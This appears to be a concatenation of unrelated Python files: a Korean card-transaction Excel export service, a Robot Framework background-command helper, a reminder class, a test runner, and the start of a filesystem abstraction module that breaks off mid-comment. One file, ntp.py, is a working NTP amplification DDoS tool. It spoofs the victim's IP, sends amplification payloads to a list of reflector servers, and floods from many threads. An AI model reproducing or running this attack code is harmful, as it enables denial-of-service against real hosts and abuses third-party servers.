excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
#카드 기간별 잔액 관리 거래별 요약조회 리스트 엑셀 다운로드 요청
#결제합계: TRNT-0002(결제)
@cardApi.route("/api/card/balance/transaction-summary/paySum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryPaySumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0002",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardPaySumListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#카드 기간별 잔액 관리 거래별 요약조회 리스 엑셀 다운로드 처리
#결제합계: TRNT-0002(결제)
def cardPaySumListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_결제합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 결제합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'});
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
worksheet.write(row, 2 ,data["transactionAmount"], money_format)
worksheet.write(row, 3 ,data["cancelTransactionAmount"], money_format)
worksheet.write(row, 4 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionAmount"], summary_money_format)
worksheet.write(row, 3 ,summaryData["cancelTransactionAmount"], summary_money_format)
worksheet.write(row, 4 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_결제합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"결제", title_format)
worksheet.write(row, 3 ,"결제취소", title_format)
worksheet.write(row, 4 ,"결제합계", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
#카드 기간별 잔액 관리 거래별 요약조회 리스트 엑셀 다운로드 요청
#환불합계: TRNT-0003(환불)
@cardApi.route("/api/card/balance/transaction-summary/refundSum/excelAll", methods=['GET'])
def cardDailyBalanceTransactionSummaryRefundSumExcelAll():
formData = {}
searchDate = getParameter(formData , "startDate").split(' - ')
startDate = paramEscape(searchDate[0])
endDate = paramEscape(searchDate[1])
queryData = {
'startDate' : startDate,
'endDate' : endDate,
'transactionType': "TRNT-0003",
'limit' : EXCEL_FILE_DOWNLOAD_COUNT,
'offset' : 0,
'orderBy' : getParameter(formData, "orderBy"),
'empId' : session['empId']
}
rootPath = current_app.root_path
t1 = threading.Thread(target=cardRefundAmountListExcelFile,args=[queryData,rootPath])
t1.daemon = True
t1.start()
return "엑셀 작업요청"
#카드 기간별 잔액 관리 거래별 요약조회 리스 엑셀 다운로드 처리]
#환불합계: TRNT-0003(환불)
def cardRefundAmountListExcelFile(queryData,rootPath):
excelZip = None
jobStatus = 0
batchId = None
try:
fileCnt = 1
makeTime = str(int(round(time.time()*1000)))
uploads = os.path.join(rootPath, "fileDownload" , "excel" , makeTime)
if not os.path.isdir(uploads):
os.makedirs(uploads)
zipFileName = u'카드_기간별_환불합계'+ datetime.now().strftime('%Y%m%d') +'.zip'
#작업 시작 메시지 추가
batchId = postBatchMng({
"reqId" : queryData['empId'],
"status" : "BAT-0001" , # 진행중
"filePath" : os.path.join(uploads ,zipFileName),
"content" : "카드 기간별 환불합계 엑셀 배치작업",
"errMsg" : ""
})["data"]["batchId"]
fileName = '카드_기간별_별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
money_format = workbook.add_format()
money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
title_format = workbook.add_format({'align':'center', 'valign':'vcenter', 'bold':True, 'border':1,'fg_color':'#A9D0F5'})
string_format = workbook.add_format({'align':'center', 'valign':'vcenter'})
summary_money_format = workbook.add_format({'fg_color' : '#E5E5E5'});
summary_money_format.set_num_format('_- #,##0_-;[red]- #,##0_-;_- "-"_-;_-@_-')
row = 0
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
while True :
searchData = getApiData("/balance/transaction-summary" , queryData ,API_SERVER_BACKOFFICE)
summaryData = searchData["totalData"]
for data in searchData["data"]:
row += 1
worksheet.write(row, 0 ,row, string_format)
worksheet.write(row, 1 ,data["merchantName"]+" - "+data["serviceName"], string_format)
worksheet.write(row, 2 ,data["transactionSum"], money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
row += 1
worksheet.write(row, 0 ,"", summary_money_format)
worksheet.write(row, 1 ,"", summary_money_format)
worksheet.write(row, 2 ,summaryData["transactionSum"], summary_money_format)
if row >= EXCEL_FILE_MAKE_LIMT_COUNT :
row = 0
fileCnt += 1
fileName = '카드_기간별_환불합계(' + queryData['startDate'] + '~' + queryData['endDate'] + ').xlsx'
# 디비 조회건수 * 2 row 생성시 파일 재생성
workbook.close()
workbook = xlsxwriter.Workbook(os.path.join(uploads ,setUnicodeEncodeTypeToEucKr(fileName)))
worksheet = workbook.add_worksheet()
worksheet.write(row, 0 ,"번호", title_format)
worksheet.write(row, 1 ,"거래처-서비스명", title_format)
worksheet.write(row, 2 ,"환불금액", title_format)
queryData["offset"] = queryData["offset"] + EXCEL_FILE_DOWNLOAD_COUNT
if len(searchData["data"])+1 < EXCEL_FILE_DOWNLOAD_COUNT :
break
workbook.close()
excelZip = zipfile.ZipFile(os.path.join(uploads ,zipFileName),'w')
for folder, subfolders, files in os.walk(uploads):
for file in files:
if file.endswith('.xlsx'):
excelZip.write(os.path.join(folder ,file), setUnicodeFormatToEucKr(file), compress_type=zipfile.ZIP_DEFLATED)
except Exception as err:
#에러 메시지 추가
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0003" , # 진행중
"errMsg" : str(err)
})
jobStatus = 1
print err
finally:
if excelZip != None:
excelZip.close()
if jobStatus == 0 :
putBatchMng({
"batchId" : str(batchId),
"reqId" : queryData['empId'],
"status" : "BAT-0002" , # 진행중
"errMsg" : ""
})
#성공 메시지 추가
print "성공"
|
AChannel.py
|
# -*- coding: utf-8 -*-
# Copyright 2017-2020 NTT Communications
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading,traceback,time,datetime
import Common,VChannel
from robot.libraries.BuiltIn import BuiltIn
import robot.libraries.DateTime as DateTime
def _thread_cmd(self,cmd):
try:
channel = self._channels[self._current_name]
self._cmd(cmd)
except Exception as err:
BuiltIn().log("WARN: A running thread for channel `%s` is \
terminated" % (channel['node']),console=False)
BuiltIn().log(err,console=False)
BuiltIn().log(traceback.format_exc(),console=False)
def _thread_repeat_cmd(stop,self,cmd,interval,with_time):
try:
channel = self._channels[self._current_name]
if with_time:
mark = datetime.datetime.now().strftime("%I:%M:%S%p on %B %d, %Y: ")
else:
mark = ""
while not stop.is_set():
self._cmd(cmd)
self.log("\n---%s---\n" % mark,channel)
time.sleep(DateTime.convert_time(interval))
except Exception as err:
BuiltIn().log("WARN: A running thread for channel `%s` is \
terminated" % (channel['node']),console=False)
BuiltIn().log(err,console=False)
BuiltIn().log(traceback.format_exc(),console=False)
class AChannel(VChannel.VChannel):
""" AChannel derives from VChannel and is used for parallel actions \
besides the main scenario.
Likes VChannel, AChannel handles a virtual terminal for each node.
While `VChannel.Cmd` is a bloking keyword, `AChannel.Cmd` is a
non-blocking keyword. When using `Cmd`, users need to control when the
command finishes its work.
"""
def __init__(self):
super(AChannel,self).__init__(u"_")
self._cmd_threads = {}
self._cmd_thread_id = 0
def cmd(self,cmd=''):
""" Exececutes a command in background
- `cmd`: a command
Returns an id that could be used for `Cmd Wait`
"""
self._cmd_thread_id += 1
thread_id = self._cmd_thread_id
self._cmd_threads[thread_id] = {}
thread = threading.Thread(target=_thread_cmd,args=(self,cmd))
thread.start()
self._cmd_threads[thread_id]['thread'] = thread
self._cmd_threads[thread_id]['stop'] = None
BuiltIn().log("Started command `%s` in other thread" % cmd)
return thread_id
def wait_cmd(self,exec_id,timeout=u'0s'):
""" Waits until a background command finishes or timeout
"""
time_s = DateTime.convert_time(timeout)
thread = self._cmd_threads[exec_id]['thread']
thread.join(time_s)
BuiltIn().log("Waited until cmd thread finished")
def stop_repeat_cmd(self,exec_id,timeout=u'0s'):
""" Stops a runnin Repeat Command by its `exec_id`
- `exec_id`: an ID return when using Cmd
"""
time_s = DateTime.convert_time(timeout)
thread = self._cmd_threads[exec_id]['thread']
stop = self._cmd_threads[exec_id]['stop']
if stop:
stop.set()
thread.join(time_s)
BuiltIn().log("Stopped a repeated command")
def repeat_cmd(self,cmd='',interval='1',with_time=True):
""" Repeat a command with `interval`
When `with_time` is ${TRUE}, a time mark will be inserted between output
of the command
"""
stop = threading.Event()
self._cmd_thread_id += 1
thread_id = self._cmd_thread_id
self._cmd_threads[thread_id] = {}
thread = threading.Thread(target=_thread_repeat_cmd,args=(stop,self,cmd,interval,with_time))
thread.start()
self._cmd_threads[thread_id]['thread'] = thread
self._cmd_threads[thread_id]['stop'] = stop
BuiltIn().log("Started command `%s` in other thread" % cmd)
return thread_id
|
ntp.py
|
#!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NTP attack...")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/other/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " packets from NTP server: " + server + " to " + target + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
task.py
|
from threading import Thread
import time
import easygui
class Task:
def __init__(self, remind_interval, completion_date, next_remind, description):
self.remind_interval = remind_interval
self.completion_date = completion_date
self.next_remind = next_remind
self.description = description
def next_alert(self):
ct = time.time()
if ct<=self.next_remind:
return self.next_remind - ct
else:
if self.completion_date-self.remind_interval < ct:
return 0
else:
return (self.completion_date - ct)%self.remind_interval
def show_reminders(self):
if time.time()>=self.completion_date:
print("event finished")
return
elif self.remind_interval <=0:
print("invalid interval")
return
else:
easygui.msgbox(self.description)
self.next_remind += self.remind_interval
time.sleep(self.remind_interval)
self.show_reminders()
return
def start_reminder(self):
time.sleep(self.next_alert())
self.show_reminders()
return
def start_alerts(self):
thread = Thread(target = self.start_reminder)
thread.start()
return
|
run-tests.py
|
#!/usr/bin/env python
# Copyright 2015 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import difflib
import fnmatch
import multiprocessing
import os
import Queue
import re
import shlex
import subprocess
import sys
import time
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
REPO_ROOT_DIR = os.path.dirname(SCRIPT_DIR)
DEFAULT_PNACL_EXE = os.path.join(REPO_ROOT_DIR, 'out', 'pnacl-opt-assert')
class Error(Exception):
pass
def AsList(value):
if value is None:
return []
elif type(value) is list:
return value
else:
return [value]
def Indent(s, spaces):
return ''.join(' '*spaces + l for l in s.splitlines(1))
def DiffLines(expected, actual):
expected_lines = expected.splitlines(1)
actual_lines = actual.splitlines(1)
return list(difflib.unified_diff(expected_lines, actual_lines,
fromfile='expected', tofile='actual'))
def FindTestFiles(directory, ext, filter_pattern_re):
tests = []
for root, dirs, files in os.walk(directory):
for f in files:
path = os.path.join(root, f)
if os.path.splitext(f)[1] == ext:
tests.append(os.path.relpath(path, SCRIPT_DIR))
tests.sort()
return [test for test in tests if re.match(filter_pattern_re, test)]
class TestInfo(object):
def __init__(self):
self.name = ''
self.header_lines = []
self.stdout_file = None
self.expected_stdout = ''
self.expected_stderr = ''
self.exe = None
self.pexe = ''
self.flags = []
self.args = []
self.expected_error = 0
self.slow = False
def Parse(self, filename):
self.name = filename
with open(filename) as f:
seen_keys = set()
state = 'header'
empty = True
header_lines = []
stdout_lines = []
stderr_lines = []
for line in f.readlines():
empty = False
m = re.match(r'\s*#(.*)$', line)
if m:
if state == 'stdout':
raise Error('unexpected directive in STDOUT block: %s' % line)
directive = m.group(1).strip()
if directive.lower() == 'stdout:':
if 'stdout_file' in seen_keys:
raise Error('can\'t have stdout section and stdout file')
state = 'stdout'
continue
if state != 'header':
raise Error('unexpected directive: %s' % line)
key, value = directive.split(':')
key = key.strip().lower()
value = value.strip()
if key in seen_keys:
raise Error('%s already set' % key)
seen_keys.add(key)
if key == 'exe':
self.exe = value
elif key == 'flags':
self.flags = shlex.split(value)
elif key == 'file':
self.pexe = value
elif key == 'error':
self.expected_error = int(value)
elif key == 'args':
self.args = shlex.split(value)
elif key == 'stdout_file':
self.stdout_file = value
with open(self.stdout_file) as s:
self.expected_stdout = s.read()
elif key == 'slow':
self.slow = True
else:
raise Error('Unknown directive: %s' % key)
elif state == 'header':
state = 'stderr'
if state == 'header':
header_lines.append(line)
elif state == 'stderr':
stderr_lines.append(line)
elif state == 'stdout':
stdout_lines.append(line)
if empty:
raise Error('empty test file')
self.header = ''.join(header_lines)
if not self.stdout_file:
self.expected_stdout = ''.join(stdout_lines)
self.expected_stderr = ''.join(stderr_lines)
def GetExecutable(self, override_exe):
if override_exe:
exe = override_exe
elif self.exe:
exe = os.path.join(REPO_ROOT_DIR, self.exe)
else:
exe = DEFAULT_PNACL_EXE
return os.path.relpath(exe, SCRIPT_DIR)
def GetCommand(self, override_exe=None):
cmd = [self.GetExecutable(override_exe)]
cmd += self.flags
cmd += AsList(self.pexe)
cmd += ['--'] + AsList(self.args)
return cmd
def Run(self, override_exe=None):
# Pass 'pnacl' as the executable name so the output is consistent
cmd = ['pnacl'] + self.GetCommand(override_exe)[1:]
exe = self.GetExecutable(override_exe)
try:
start_time = time.time()
process = subprocess.Popen(cmd, executable=exe, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
duration = time.time() - start_time
except OSError as e:
raise Error(str(e))
return stdout, stderr, process.returncode, duration
def Rebase(self, stdout, stderr):
with open(self.name, 'w') as f:
f.write(self.header)
f.write(stderr)
if self.stdout_file:
with open(self.stdout_file, 'w') as s:
s.write(stdout)
elif stdout:
f.write('# STDOUT:\n')
f.write(stdout)
def Diff(self, stdout, stderr):
if self.expected_stderr != stderr:
diff_lines = DiffLines(self.expected_stderr, stderr)
raise Error('stderr mismatch:\n' + ''.join(diff_lines))
if self.expected_stdout != stdout:
if self.stdout_file:
raise Error('stdout binary mismatch')
else:
diff_lines = DiffLines(self.expected_stdout, stdout)
raise Error('stdout mismatch:\n' + ''.join(diff_lines))
class Status(object):
def __init__(self, verbose):
self.verbose = verbose
self.start_time = None
self.last_length = 0
self.last_finished = None
self.passed = 0
self.failed = 0
self.total = 0
self.failed_tests = []
def Start(self, total):
self.total = total
self.start_time = time.time()
def Passed(self, info, duration):
self.passed += 1
if self.verbose:
sys.stderr.write('+ %s (%.3fs)\n' % (info.name, duration))
else:
self.Clear()
self._PrintShortStatus(info)
sys.stderr.flush()
def Failed(self, info, error_msg):
self.failed += 1
self.failed_tests.append(info)
self.Clear()
sys.stderr.write('- %s\n%s\n' % (info.name, Indent(error_msg, 2)))
def Skipped(self, info):
if self.verbose:
sys.stderr.write('. %s (skipped)\n' % info.name)
def Timeout(self):
self._PrintShortStatus(self.last_finished)
def Print(self):
self._PrintShortStatus(None)
sys.stderr.write('\n')
def _PrintShortStatus(self, info):
total_duration = time.time() - self.start_time
name = info.name if info else ''
percent = 100 * (self.passed + self.failed) / self.total
status = '[+%d|-%d|%%%d] (%.2fs) %s\r' % (self.passed, self.failed,
percent, total_duration, name)
self.last_length = len(status)
self.last_finished = info
sys.stderr.write(status)
def Clear(self):
if not self.verbose:
sys.stderr.write('%s\r' % (' ' * self.last_length))
def GetAllTestInfo(test_names, status):
infos = []
for test_name in test_names:
info = TestInfo()
try:
info.Parse(test_name)
infos.append(info)
except Error as e:
status.Failed(info, str(e))
return infos
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--executable', help='override executable.')
parser.add_argument('-v', '--verbose', help='print more diagnotic messages.',
action='store_true')
parser.add_argument('-l', '--list', help='list all tests.',
action='store_true')
parser.add_argument('--list-exes',
help='list all executables needed for the tests.',
action='store_true')
parser.add_argument('-r', '--rebase',
help='rebase a test to its current output.',
action='store_true')
parser.add_argument('-s', '--slow', help='run slow tests.',
action='store_true')
parser.add_argument('-j', '--jobs', help='number of jobs to use to run tests',
type=int, default=multiprocessing.cpu_count())
parser.add_argument('patterns', metavar='pattern', nargs='*',
help='test patterns.')
options = parser.parse_args(args)
if options.patterns:
pattern_re = '|'.join(fnmatch.translate('*%s*' % p)
for p in options.patterns)
else:
pattern_re = '.*'
test_names = FindTestFiles(SCRIPT_DIR, '.txt', pattern_re)
if options.list:
for test_name in test_names:
print test_name
return 0
if options.executable:
if not os.path.exists(options.executable):
parser.error('executable %s does not exist' % options.executable)
options.executable = os.path.abspath(options.executable)
run_cwd = os.getcwd()
os.chdir(SCRIPT_DIR)
isatty = os.isatty(1)
status = Status(options.verbose)
infos = GetAllTestInfo(test_names, status)
if options.list_exes:
exes = set([info.exe for info in infos])
if None in exes:
exes.remove(None)
exes.add(os.path.relpath(DEFAULT_PNACL_EXE, run_cwd))
print '\n'.join(exes)
return 0
inq = multiprocessing.Queue()
test_count = 0
for info in infos:
if not options.slow and info.slow:
status.Skipped(info)
continue
inq.put(info)
test_count += 1
outq = multiprocessing.Queue()
num_proc = options.jobs
processes = []
status.Start(test_count)
def Worker(options, inq, outq):
while True:
try:
info = inq.get(False)
try:
out = info.Run(options.executable)
except Error as e:
outq.put((info, e))
continue
outq.put((info, out))
except Queue.Empty:
# Seems this can be fired even when the queue isn't actually empty.
# Double-check, via inq.empty()
if inq.empty():
break
try:
for p in range(num_proc):
proc = multiprocessing.Process(target=Worker, args=(options, inq, outq))
processes.append(proc)
proc.start()
finished_tests = 0
while finished_tests < test_count:
try:
info, result = outq.get(True, 0.01)
except Queue.Empty:
status.Timeout()
continue
finished_tests += 1
try:
if isinstance(result, Error):
raise result
stdout, stderr, returncode, duration = result
if returncode != info.expected_error:
# This test has already failed, but diff it anyway.
msg = 'expected error code %d, got %d.' % (info.expected_error,
returncode)
try:
info.Diff(stdout, stderr)
except Error as e:
msg += '\n' + str(e)
raise Error(msg)
else:
if options.rebase:
info.Rebase(stdout, stderr)
else:
info.Diff(stdout, stderr)
status.Passed(info, duration)
except Error as e:
status.Failed(info, str(e))
finally:
for proc in processes:
proc.terminate()
proc.join()
status.Clear()
ret = 0
if status.failed:
sys.stderr.write('**** FAILED %s\n' % ('*' * (80 - 14)))
for info in status.failed_tests:
name = info.name
cmd = info.GetCommand(options.executable)
exe = os.path.relpath(info.GetExecutable(options.executable), run_cwd)
msg = Indent('cmd = (cd %s && %s)\n' % (
os.path.relpath(SCRIPT_DIR, run_cwd), ' '.join(cmd)), 2)
msg += Indent('rerun = %s\n' % ' '.join(
[sys.executable, sys.argv[0], '-e', exe, name]), 2)
sys.stderr.write('- %s\n%s\n' % (name, msg))
ret = 1
status.Print()
return ret
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
|
base.py
|
#!/usr/bin/env python
"""
fs.base
=======
This module defines the most basic filesystem abstraction, the FS class.
Instances of FS represent a filesystem containing files and directories
that can be queried and manipulated. To implement a new kind of filesystem,
start by sublcassing the base FS class.
For more information regarding implementing a working PyFilesystem interface, see :ref:`implementers`.
"""
__all__ = ['DummyLock',
'silence_fserrors',
'NullFile',
'synchronize',
'FS',
'flags_to_mode',
'NoDefaultMeta']
import os
import os.path
import shutil
import fnmatch
import datetime
import time
try:
import threading
except ImportError:
import dummy_threading as threading
from fs.path import *
from fs.errors import *
from fs.local_functools import wraps
class DummyLock(object):
"""A dummy lock object that doesn't do anything.
This is used as a placeholder when locking is disabled. We can't
directly use the Lock class from the dummy_threading module, since
it attempts to sanity-check the sequence of acquire/release calls
in a way that breaks when real threading is available.
"""
def acquire(self, blocking=1):
"""Acquiring a DummyLock always succeeds."""
return 1
def release(self):
"""Releasing a DummyLock always succeeds."""
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def silence_fserrors(f, *args, **kwargs):
"""Perform a function call and return ``None`` if an :class:`fs.errors.FSError` is thrown
:param f: Function to call
:param args: Parameters to f
:param kwargs: Keyword parameters to f
"""
try:
return f(*args, **kwargs)
except FSError:
return None
class NoDefaultMeta(object):
"""A singleton used to signify that there is no default for getmeta"""
pass
class NullFile(object):
"""A NullFile is a file object that has no functionality.
Null files are returned by the :meth:`fs.base.FS.safeopen` method in FS objects when the
file doesn't exist. This can simplify code by negating the need to check
if a file exists, or handling exceptions.
"""
def __init__(self):
self.closed = False
def __iter__(self):
return self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.closed = True
def flush(self):
pass
def next(self):
raise StopIteration
def readline(self, *args, **kwargs):
return ""
def close(self):
self.closed = True
def read(self, size=None):
return ""
def seek(self, *args, **kwargs):
pass
def tell(self):
return 0
def truncate(self, *args, **kwargs):
return 0
def write(self, data):
pass
def writelines(self, *args, **kwargs):
pass
def synchronize(func):
"""Decorator to synchronize a method on self._lock."""
@wraps(func)
def acquire_lock(self, *args, **kwargs):
self._lock.acquire()
try:
return func(self, *args, **kwargs)
finally:
self._lock.release()
return acquire_lock
class FS(object):
"""The base class for Filesystem abstraction objects.
An instance of a class derived from FS is an abstraction on some kind of filesystem, such as the OS filesystem or a zip file.
"""
_meta = {}
def __init__(self, thread_synchronize=False):
"""The base class for Filesystem objects.
:param thread_synconize: If True, a lock object will be created for the object, otherwise a dummy lock will be used.
:type thread_synchronize: bool
"""
super(FS, self).__init__()
self.closed = False
self.thread_synchronize = thread_synchronize
if thread_synchronize:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def __del__(self):
if not getattr(self, 'closed', True):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def cachehint(self, enabled):
"""Recommends the use of caching. Implementations are free to use or
ignore this value.
:param enabled: If True the implementation is permitted to aggressively cache directory
structure / file information. Caching such information can speed up many operations,
particularly for network based filesystems. The downside of caching is that
changes made to directories or files outside of this interface may not be picked up immediately.
"""
pass
# Deprecating cache_hint in favour of no underscore version, for consistency
cache_hint = cachehint
def close(self):
"""Close the filesystem. This will perform any shutdown related
operations required. This method will be called automatically when
the filesystem object is garbage collected, but it is good practice
to call it explicitly so that any attached resourced are freed when they
are no longer required.
"""
self.closed = True
def __getstate__(self):
# Locks can't be pickled, so instead we just indicate the
